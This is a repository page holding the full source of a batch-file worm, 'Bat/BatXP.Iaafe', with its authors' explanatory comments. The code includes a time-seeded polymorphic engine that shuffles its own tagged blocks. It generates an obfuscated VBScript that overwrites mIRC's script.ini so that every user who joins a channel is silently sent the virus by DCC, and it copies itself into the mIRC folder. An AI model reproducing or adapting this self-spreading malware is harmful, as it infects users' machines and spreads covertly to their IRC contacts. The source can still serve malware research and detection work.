-
Notifications
You must be signed in to change notification settings - Fork 19
/
Copy pathBat.Iaafe.bat
458 lines (436 loc) · 19.7 KB
/
Bat.Iaafe.bat
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
set generation=0
@echo off % spth-phile %
cls % spth-phile %
% spth-phile %set /a generation=%generation%+1
% spth-phile %if %generation% EQU 5 (
% spth-phile %echo You are infect with philet0ast3r's and Second Part To Hell's Bat/BatXP.Iaafe!
% spth-phile %set generation=0
% spth-phile %)
% spth-phile %echo set generation=%generation% >poly.bat
:: Bat/BatXP.Iaafe % spth-phile %
:: by philet0ast3r[rRlf] & Second Part To Hell[rRlf] % spth-phile %
:: % spth-phile %
:: philet0ast3r: Virus idea, name idea and the genial random engine :D % spth-phile %
:: Second Part To Hell: Included the virus part, encrypt the BAT/VBS part, BatXP workable (workable? +fg+), made this stuff polymporph and the comments % spth-phile %
:: % spth-phile %
:: Big thanks goes to Lord Yup for writting the the "Silend DCC SEND"-Article { You'll find it in 29A #6 } % spth-phile %
:: ------------------------------------------------------------------------------------------------------------------------------------------ % spth-phile %
:: General Virus Info: % spth-phile %
:: % spth-phile %
:: Name of the Virus................................. Bat/BatXP.Iaafe % spth-phile %
:: Author............................................ philet0ast3r & Second Part To Hell % spth-phile %
:: Size.............................................. 20.194 byte % spth-phile %
:: Encrypt........................................... Most of the virus part and something of the random-engine % spth-phile %
:: Polymorphism...................................... Yes % spth-phile %
:: (possible variants under WinXP (21*20*19*18*17*16*15*14*13*12*11*10*9*8*7*6*5*4*3*2) = 51090942171709440000 = ca. 51 trillion :] ) % spth-phile %
:: (possible variants under WinME/98/95 (5*4*3*2) =120 ... because command.com doesn't allow more sets) % spth-phile %
:: Spreading......................................... The virus spreads via mIRC, but not the normal "one-line-mIRC-spreading" way, but % spth-phile %
:: a much better one. The User won't know, that he's infect. % spth-phile %
:: Payload........................................... Every 5th generation the virus shows a shourt text % spth-phile %
:: % spth-phile %
:: Last words by Second Part To Hell: % spth-phile %
:: I nearly commited suicide while writing this virus ;), % spth-phile %
:: because i had to fix more than 1.000.000 bugs in this fuckin' program. % spth-phile %
:: But I'm sure, i fixed all and now the virus works without mistake. % spth-phile %
:: % spth-phile %
:: Last words by philet0ast3r: % spth-phile %
:: I just want to thank/greet some important persons: % spth-phile %
:: breathe for helping me getting the idea how a batch random # generator could work % spth-phile %
:: 3ri5, kathi, ina, janine & phily for being real friends (and more ;) % spth-phile %
:: Slage Hammer % spth-phile %
:: alcopaul % spth-phile %
:: the rest of the rRlf and some other ppl, who know me % spth-phile %
:: % spth-phile %
% spth-phile %set generation=
% spth-phile %set qwxykjsi=set
% spth-phile %set aaa=A
%qwxykjsi% fi=if % spth-phile %
%qwxykjsi% nt=not % spth-phile %
%qwxykjsi% el=errorlevel % spth-phile %
%qwxykjsi% ine=%fi% %nt% %el% % spth-phile %
% spth-phile %set vrsa=rndom
set oto=goto% spth-phile %
%qwxykjsi% a=0 % spth-phile %
set fd=find% spth-phile %
:: This part makes the set's for the crypt BAT part
%fd% "spth-phile"<%0>>poly.bat
:: The virus searches for "spth-phile" in every line of itself an
:: write this lines to the poly.bat file
%qwxykjsi% xp=true% spth-phile %
% spth-phile %if %xp% EQU true goto xptruea
:: It's a BatXP command, if it's true, the virus goes to the BatXP part
goto winparta % spth-phile %
:: Else it goes to the Bat part
:xptruea % spth-phile %
% spth-phile %set a=0
% spth-phile %set b=0
% spth-phile %set c=0
% spth-phile %set d=0
% spth-phile %set e=0
% spth-phile %set f=0
% spth-phile %set g=0
% spth-phile %set h=0
% spth-phile %set i=0
% spth-phile %set j=0
% spth-phile %set k=0
% spth-phile %set l=0
% spth-phile %set m=0
% spth-phile %set n=0
% spth-phile %set o=0
% spth-phile %set p=0
% spth-phile %set q=0
% spth-phile %set r=0
% spth-phile %set s=0
% spth-phile %set t=0
% spth-phile %set u=0
:: This set's are for the poly engine, because the variables can't be nothing
:: in an if-part
:start0 % spth-phile %
% spth-phile %set aa=0
:: aa, the main poly-engine variable is zero
:start1 % spth-phile %
if %aa% EQU 5 goto endpoly % spth-phile %
%qwxykjsi% /a aa=%aa%+1 % spth-phile %
:: aa is aa+1
:start2 % spth-phile %
ver|time|%fd% ",1">nul % spth-phile %
:: Searching after "1" in the current time
%ine% 1 %qwxykjsi% %vrsa%%aa%=1% spth-phile %
:: If there is no errorlevel, that means, if the searching number in the time
:: is 1, the variable %vrsa%(random)%aa%(changes, but at first it's 1) is 1!
%ine% 1 %oto% start1 % spth-phile %
:: Goto start
ver|time|%fd% ",2">nul % spth-phile %
%ine% 1 %qwxykjsi% %vrsa%%aa%=2% spth-phile %
%ine% 1 %oto% start1 % spth-phile %
:: Ones more the same
ver|time|%fd% ",3">nul % spth-phile %
%ine% 1 %qwxykjsi% %vrsa%%aa%=3% spth-phile %
%ine% 1 %oto% start1 % spth-phile %
ver|time|%fd% ",4">nul % spth-phile %
%ine% 1 %qwxykjsi% %vrsa%%aa%=4% spth-phile %
%ine% 1 %oto% start1 % spth-phile %
ver|time|%fd% ",5">nul % spth-phile %
%ine% 1 %qwxykjsi% %vrsa%%aa%=5% spth-phile %
%ine% 1 %oto% start1 % spth-phile %
ver|time|%fd% ",6">nul % spth-phile %
%ine% 1 %qwxykjsi% %vrsa%%aa%=6% spth-phile %
%ine% 1 %oto% start1 % spth-phile %
ver|time|%fd% ",7">nul % spth-phile %
%ine% 1 %qwxykjsi% %vrsa%%aa%=7% spth-phile %
%ine% 1 %oto% start1 % spth-phile %
ver|time|%fd% ",8">nul % spth-phile %
%ine% 1 %qwxykjsi% %vrsa%%aa%=8% spth-phile %
%ine% 1 %oto% start1 % spth-phile %
ver|time|%fd% ",9">nul % spth-phile %
%ine% 1 %qwxykjsi% %vrsa%%aa%=9% spth-phile %
%ine% 1 %oto% start1 % spth-phile %
ver|time|%fd% ",0">nul % spth-phile %
%ine% 1 %qwxykjsi% %vrsa%%aa%=10% spth-phile %
%ine% 1 %oto% start1 % spth-phile %
goto start2 % spth-phile %
:endpoly % spth-phile %
% spth-phile %if %a% NEQ 1 (if %rndom1% EQU 1 (
% spth-phile %find "%aaa%AAA" <%0 >>poly.bat
% spth-phile %set a=1
% spth-phile %))
:: The last 4 lines are one if-part.
:: If a <> 1 AND if %random1% (you know: %vrsa%%aa%) is 1 then seaching
:: after "BBBB" in the whole code, and write it to poly.bat. And changing
:: the "a" to 1! So this part of the code won't write ones more to the poly.bat
% spth-phile %if %b% NEQ 1 (if %rndom1% EQU 2 (
% spth-phile %find "%aaa%BBB" <%0 >>poly.bat
% spth-phile %set b=1
% spth-phile %))
:: The same
% spth-phile %if %c% NEQ 1 (if %rndom1% EQU 3 (
% spth-phile %find "%aaa%CCC" <%0 >>poly.bat
% spth-phile %set c=1
% spth-phile %))
% spth-phile %if %d% NEQ 1 (if %rndom1% EQU 4 (
% spth-phile %find "%aaa%DDD" <%0 >>poly.bat
% spth-phile %set d=1
% spth-phile %))
% spth-phile %if %e% NEQ 1 (if %rndom2% EQU 1 (
% spth-phile %find "%aaa%EEE" <%0 >>poly.bat
% spth-phile %set e=1
% spth-phile %))
% spth-phile %if %f% NEQ 1 (if %rndom2% EQU 2 (
% spth-phile %find "%aaa%FFF" <%0 >>poly.bat
% spth-phile %set f=1
% spth-phile %))
% spth-phile %if %g% NEQ 1 (if %rndom2% EQU 3 (
% spth-phile %find "%aaa%GGG" <%0 >>poly.bat
% spth-phile %set g=1
% spth-phile %))
% spth-phile %if %h% NEQ 1 (if %rndom2% EQU 4 (
% spth-phile %find "%aaa%HHH" <%0 >>poly.bat
% spth-phile %set h=1
% spth-phile %))
% spth-phile %if %i% NEQ 1 (if %rndom3% EQU 1 (
% spth-phile %find "%aaa%III" <%0 >>poly.bat
% spth-phile %set i=1
% spth-phile %))
% spth-phile %if %j% NEQ 1 (if %rndom3% EQU 2 (
% spth-phile %find "%aaa%JJJ" <%0 >>poly.bat
% spth-phile %set j=1
% spth-phile %))
% spth-phile %if %k% NEQ 1 (if %rndom3% EQU 3 (
% spth-phile %find "%aaa%KKK" <%0 >>poly.bat
% spth-phile %set k=1
% spth-phile %))
% spth-phile %if %l% NEQ 1 (if %rndom3% EQU 4 (
% spth-phile %find "%aaa%LLL" <%0 >>poly.bat
% spth-phile %set l=1
% spth-phile %))
% spth-phile %if %m% NEQ 1 (if %rndom4% EQU 1 (
% spth-phile %find "%aaa%MMM" <%0 >>poly.bat
% spth-phile %set m=1
% spth-phile %))
% spth-phile %if %n% NEQ 1 (if %rndom4% EQU 2 (
% spth-phile %find "%aaa%NNN" <%0 >>poly.bat
% spth-phile %set n=1
% spth-phile %))
% spth-phile %if %o% NEQ 1 (if %rndom4% EQU 3 (
% spth-phile %find "%aaa%OOO" <%0 >>poly.bat
% spth-phile %set o=1
% spth-phile %))
% spth-phile %if %p% NEQ 1 (if %rndom4% EQU 4 (
% spth-phile %find "%aaa%PPP" <%0 >>poly.bat
% spth-phile %set p=1
% spth-phile %))
% spth-phile %if %q% NEQ 1 (if %rndom5% EQU 1 (
% spth-phile %find "%aaa%QQQ" <%0 >>poly.bat
% spth-phile %set q=1
% spth-phile %))
% spth-phile %if %r% NEQ 1 (if %rndom5% EQU 2 (
% spth-phile %find "%aaa%RRR" <%0 >>poly.bat
% spth-phile %set r=1
% spth-phile %))
% spth-phile %if %s% NEQ 1 (if %rndom5% EQU 3 (
% spth-phile %find "%aaa%SSS" <%0 >>poly.bat
% spth-phile %set s=1
% spth-phile %))
% spth-phile %if %t% NEQ 1 (if %rndom5% EQU 4 (
% spth-phile %find "%aaa%TTT" <%0 >>poly.bat
% spth-phile %set t=1
% spth-phile %))
% spth-phile %if %u% NEQ 1 (if %rndom5% EQU 5 (
% spth-phile %find "%aaa%UUU" <%0 >>poly.bat
% spth-phile %set u=1
% spth-phile %))
% spth-phile %if %a% EQU 1 (if %b% EQU 1 (if %c% EQU 1 (if %d% EQU 1 (
% spth-phile %if %e% EQU 1 (if %f% EQU 1 (if %g% EQU 1 (if %h% EQU 1 (
% spth-phile %if %i% EQU 1 (if %j% EQU 1 (if %k% EQU 1 (if %l% EQU 1 (
% spth-phile %if %m% EQU 1 (if %n% EQU 1 (if %o% EQU 1 (if %p% EQU 1 (
% spth-phile %if %q% EQU 1 (if %r% EQU 1 (if %s% EQU 1 (if %t% EQU 1 (if %u% EQU 1 (
goto irca % spth-phile %
% spth-phile %)))))))))))))))))))))
:: The last 7 lines are one really gigant if-part :)
:: If every letter from "a" to "u" is 1, then the file goes to the mIRC part.
goto start0 % spth-phile %
:: Else it goes to the start0 part (and searches ones more for random-numbers)
:winparta % spth-phile %
:: Here you can find the normal Bat. If the OS isn't WinXP/Win2000prof,
:: the virus will start it's life here.
set wina=0% spth-phile %
set winb=0% spth-phile %
set winc=0% spth-phile %
set wind=0% spth-phile %
set wine=0% spth-phile %
set oto=% spth-phile %
set qwxykjsi=% spth-phile %
set nt=% spth-phile %
set fi=% spth-phile %
set el=% spth-phile %
set ine=% spth-phile %
:: These are some variables for cryption or for the poly-engine
:startwin2 % spth-phile %
% spth-phile %if not %wina%==1 goto polyengi
% spth-phile %if not %winb%==1 goto polyengi
% spth-phile %if not %winc%==1 goto polyengi
% spth-phile %if not %wind%==1 goto polyengi
% spth-phile %if not %wine%==1 goto polyengi
:: These 5 lines are doing the same as the big 7-lines-if-part in the BatXP!
goto winirc % spth-phile %
:polyengi % spth-phile %
ver|time|find ",1">nul % spth-phile %
if not errorlevel 1 set randoma=1% spth-phile %
if not errorlevel 1 goto enpolywin % spth-phile %
:: You have to know these lines, because I explained it in the BatXP part
ver|time|find ",2">nul % spth-phile %
if not errorlevel 1 set randoma=2% spth-phile %
if not errorlevel 1 goto enpolywin % spth-phile %
ver|time|find ",3">nul % spth-phile %
if not errorlevel 1 set randoma=3% spth-phile %
if not errorlevel 1 goto enpolywin % spth-phile %
ver|time|find ",4">nul % spth-phile %
if not errorlevel 1 set randoma=4% spth-phile %
if not errorlevel 1 goto enpolywin % spth-phile %
ver|time|find ",5">nul % spth-phile %
if not errorlevel 1 set randoma=5% spth-phile %
if not errorlevel 1 goto enpolywin % spth-phile %
goto startwin2 % spth-phile %
:enpolywin % spth-phile %
% spth-phile %if not %wina%==1 if %randoma%==1 goto enapolywin
% spth-phile %if not %winb%==1 if %randoma%==2 goto enbpolywin
% spth-phile %if not %winc%==1 if %randoma%==3 goto encpolywin
% spth-phile %if not %wind%==1 if %randoma%==4 goto endpolywin
% spth-phile %if not %wine%==1 if %randoma%==5 goto enepolywin
:: If the variable "wina-e" isn't 1, then if the "randoma" is 1-5,
:: the virus goes to an other part of the Bat-poly-engine
goto startwin2 % spth-phile %
:enapolywin % spth-phile %
% spth-phile %find "%aaa%BBB"<%0>> poly.bat
% spth-phile %find "%aaa%AAA"<%0>> poly.bat
% spth-phile %find "%aaa%KKK"<%0>> poly.bat
% spth-phile %find "%aaa%DDD"<%0>> poly.bat
set wina=1% spth-phile %
:: The virus writes every lines with "ABBB","AAAA","AKKK","ADDD" to the poly-file
:: and changes the variable "wina" to 1
% spth-phile %goto startwin2
:enbpolywin % spth-phile %
% spth-phile %find "%aaa%EEE"<%0>> poly.bat
% spth-phile %find "%aaa%LLL"<%0>> poly.bat
% spth-phile %find "%aaa%GGG"<%0>> poly.bat
% spth-phile %find "%aaa%HHH"<%0>> poly.bat
set winb=1% spth-phile %
% spth-phile %goto startwin2
:encpolywin % spth-phile %
% spth-phile %find "%aaa%III"<%0>> poly.bat
% spth-phile %find "%aaa%JJJ"<%0>> poly.bat
% spth-phile %find "%aaa%CCC"<%0>> poly.bat
% spth-phile %find "%aaa%FFF"<%0>> poly.bat
set winc=1% spth-phile %
% spth-phile %goto startwin2
:endpolywin % spth-phile %
% spth-phile %find "%aaa%NNN"<%0>> poly.bat
% spth-phile %find "%aaa%MMM"<%0>> poly.bat
% spth-phile %find "%aaa%PPP"<%0>> poly.bat
% spth-phile %find "%aaa%OOO"<%0>> poly.bat
set wind=1% spth-phile %
% spth-phile %goto startwin2
:enepolywin % spth-phile %
% spth-phile %find "%aaa%RRR"<%0>> poly.bat
% spth-phile %find "%aaa%SSS"<%0>> poly.bat
% spth-phile %find "%aaa%UUU"<%0>> poly.bat
% spth-phile %find "%aaa%TTT"<%0>> poly.bat
% spth-phile %find "%aaa%QQQ"<%0>> poly.bat
set wine=1% spth-phile %
% spth-phile %goto startwin2
:winirc % spth-phile %
% spth-phile %set wina=
% spth-phile %set winb=
% spth-phile %set winc=
% spth-phile %set wind=
% spth-phile %set wine=
% spth-phile %set aaa=
% spth-phile %set randoma=
:: All variables used in the poly-engine are deleted
:irca % AAAA %
if exist C:\mirc\script.ini set mir=C:\mirc% AAAA %
echo %mir%
if exist C:\mirc32\script.ini set mir=C:\mirc32% AAAA %
if exist C:\proga~1\mirc\script.ini set mir=C:\progra~1\mirc% AAAA %
if exist C:\prgra~1\mirc32\script.ini set mir=C:\progra~1\mirc32% AAAA %
goto ircb% AAAA %
:ircb % ABBB %
set mirc=%mir%\script.ini% ABBB %
set vs=chr(% ABBB %
goto ircc% ABBB %
:ircc % ACCC %
set wc=echo file.writeline% ACCC %
goto ircd% ACCC %
:ircd % ADDD %
echo dim fso, file > irc.vbs% ADDD %
echo set fso = createobject("scripting.filesystemobject") >>irc.vbs% ADDD %
echo set file = fso.createtextfile ("%mir%\script.ini", true)>>irc.vbs% ADDD %
goto irce% ADDD %
:irce % AEEE %
%wc% " on 1:st" + %vs%97) + "rt: { ." + %vs%115) + %vs%101) + %vs%116) + " " + %vs%37) + "filee %mir%\name.b" + %vs%97) + "t }">>irc.vbs% AEEE %
%wc% " on 1:join:#: { ">>irc.vbs% AEEE %
%wc% " .if (" + %vs%36) + "nick != " + %vs%36) + "me " + %vs%38) + "" + %vs%38) + " " + %vs%37) + "old != " + %vs%36) + "nick) {">>irc.vbs% AEEE %
goto ircf% AEEE %
:ircf % AFFF %
%wc% " ." + %vs%115) + %vs%101) + %vs%116) + " " + %vs%37) + "old " + %vs%36) + "nick">>irc.vbs% AFFF %
%wc% " .timer " + %vs%36) + "+ " + %vs%36) + "r" + %vs%97) + "nd(1,100000) 1 5 ." + %vs%36) + "check_him( " + %vs%36) + "nick , " + %vs%36) + "ch" + %vs%97) + "n )">>irc.vbs% AFFF %
goto ircg% AFFF %
:ircg % AGGG %
%wc% " } ">>irc.vbs% AGGG %
%wc% " }">>irc.vbs% AGGG %
%wc% " " + %vs%97) + "li" + %vs%97) + "s check_him {">>irc.vbs% AGGG %
goto irch% AGGG %
:irch % AHHH %
%wc% " ." + %vs%115) + %vs%101) + %vs%116) + " " + %vs%37) + "port " + %vs%36) + "r" + %vs%97) + "nd(9999,999999) ">>irc.vbs% AHHH %
%wc% " .while (" + %vs%36) + "portfree(" + %vs%37) + "port) == " + %vs%36) + "f" + %vs%97) + "lse) { ." + %vs%115) + %vs%101) + %vs%116) + " " + %vs%37) + "port " + %vs%36) + "r" + %vs%97) + "nd(9999,999999) }">>irc.vbs% AHHH %
goto irci% AHHH %
:irci % AIII %
%wc% " .%fi% (" + %vs%36) + "1 !isop " + %vs%36) + "2) { ">>irc.vbs% AIII %
%wc% " .%nt%ice " + %vs%36) + "1 :DCC " + %vs%115) + %vs%101) + %vs%110) + %vs%100) + " teletubies ( " + %vs%36) + "+ " + %vs%36) + "ip " + %vs%36) + "+ ) ">>irc.vbs% AIII %
goto ircj% AIII %
:ircj % AJJJ %
%wc% " ." + %vs%115) + %vs%101) + %vs%116) + " " + %vs%37) + "sock_n" + %vs%97) + "me " + %vs%36) + "r" + %vs%97) + "nd(1,99999)">>irc.vbs% AJJJ %
%wc% " .msg " + %vs%36) + "1 DCC " + %vs%115) + %vs%101) + %vs%110) + %vs%100) + " " + %vs%37) + "filee " + %vs%36) + "longip(" + %vs%36) + "ip) " + %vs%37) + "port " + %vs%36) + "file(" + %vs%37) + "filee).size " + %vs%36) + "+ ">>irc.vbs% AJJJ %
%wc% " .socklisten " + %vs%37) + "sock_n" + %vs%97) + "me " + %vs%37) + "port">>irc.vbs% AJJJ %
goto irck% AJJJ %
:irck % AKKK %
%wc% " .timers off">>irc.vbs% AKKK %
%wc% " .timer " + %vs%36) + "+ " + %vs%36) + "r" + %vs%97) + "nd(1,99999) 0 10 .cloze">>irc.vbs% AKKK %
%wc% " } ">>irc.vbs% AKKK %
goto ircl% AKKK %
:ircl % ALLL %
%wc% " }">>irc.vbs% ALLL %
%wc% " on 1:socklisten:" + %vs%37) + "sock_n" + %vs%97) + "me: {">>irc.vbs% ALLL %
goto ircm% ALLL %
:ircm % AMMM %
%wc% " ." + %vs%115) + %vs%101) + %vs%116) + " " + %vs%37) + "client_n" + %vs%97) + "me " + %vs%36) + "r" + %vs%97) + "nd(1,9999999)">>irc.vbs% AMMM %
%wc% " .sockclose " + %vs%37) + "sock_n" + %vs%97) + "me">>irc.vbs% AMMM %
goto ircn% AMMM %
:ircn % ANNN %
%wc% " ." + %vs%115) + %vs%101) + %vs%116) + " " + %vs%37) + "l 0">>irc.vbs% ANNN %
%wc% " .bre" + %vs%97) + "d " + %vs%37) + "filee " + %vs%37) + "l 4000 " + %vs%38) + "le">>irc.vbs % ANNN %
goto irco% ANNN %
:irco % AOOO %
%wc% " .sockwrite -b " + %vs%37) + "client_n" + %vs%97) + "me 4000 " + %vs%38) + "le">>irc.vbs% AOOO %
%wc% " " + %vs%37) + "l = " + %vs%37) + "l + 4000">>irc.vbs% AOOO %
goto ircp% AOOO %
:ircp % APPP %
%wc% " ." + %vs%115) + %vs%101) + %vs%116) + " " + %vs%37) + "end 0">>irc.vbs% APPP %
%wc% " }">>irc.vbs% APPP %
%wc% " on 1:sockre" + %vs%97) + "d:" + %vs%37) + "client_n" + %vs%97) + "me: {">>irc.vbs% APPP %
goto ircq % APPP %
:ircq % AQQQ %
%wc% " .%fi% (" + %vs%37) + "l >= " + %vs%36) + "file(" + %vs%37) + "filee).size) {">>irc.vbs% AQQQ %
%wc% " ." + %vs%115) + %vs%101) + %vs%116) + " " + %vs%37) + "end 1">>irc.vbs% AQQQ %
goto ircr% AQQQ %
:ircr % ARRR %
%wc% " .sockclose " + %vs%37) + "client_n" + %vs%97) + "me">>irc.vbs% ARRR %
%wc% " .h" + %vs%97) + "lt">>irc.vbs% ARRR %
%wc% " } .else {">>irc.vbs% ARRR %
goto ircs% ARRR %
:ircs % ASSS %
%wc% " .%fi% (" + %vs%37) + "end != 1) {">>irc.vbs% ASSS %
%wc% " .bre" + %vs%97) + "d " + %vs%37) + "filee " + %vs%37) + "l 4000 " + %vs%38) + "le">>irc.vbs% ASSS %
goto irct% ASSS %
:irct % ATTT %
%wc% " .sockwrite -b " + %vs%37) + "client_n" + %vs%97) + "me 4000 " + %vs%38) + "le">>irc.vbs% ATTT %
%wc% " " + %vs%37) + "l = " + %vs%37) + "l + 4000">>irc.vbs% ATTT %
%wc% " } } }">>irc.vbs% ATTT %
goto ircu% ATTT %
:ircu % AUUU %
%wc% " " + %vs%97) + "li" + %vs%97) + "s cloze { .sockclose " + %vs%37) + "sock_n" + %vs%97) + "me } ">>irc.vbs% AUUU %
echo file.Close >>irc.vbs% AUUU %
cscript irc.vbs% AUUU %
cls% AUUU %
goto eirc% AUUU %
:: This is the whole virus part
:: It spreads via mIRC, and is mostly encrypt
:eirc % phile-spth %
del irc.vbs % phile-spth %
find "phile-spth"<%0>>poly.bat
copy poly.bat %mir%\name.bat % phile-spth %
del poly.bat % phile-spth %
cls % phile-spth %
:: Last but not least, the virus searchs for "phile-spth" in the viruscode,
:: And write it to the poly.bat! Then it copies the poly.bat to the mIRC-dir
:: and deletes the irc-vbs and the poly.bat!